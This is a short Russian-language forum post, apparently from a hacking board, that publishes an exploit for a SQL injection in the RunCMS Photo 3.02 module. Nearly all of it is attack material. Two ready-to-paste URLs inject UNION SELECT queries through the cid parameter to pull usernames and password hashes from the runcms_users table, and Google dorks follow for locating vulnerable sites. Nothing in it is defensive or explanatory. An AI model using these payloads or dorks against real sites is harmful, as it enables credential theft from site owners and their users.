22.03.2008, 13:03
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
SQL Injection
Vulnerable: Module Photo 3.02
Exploit:
Код:
admin
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Dork:
Код:
allinurl: "modules/photo/viewcat.php?id"
inurl:photo "powered by runcms"
© S@BUN
|
|
|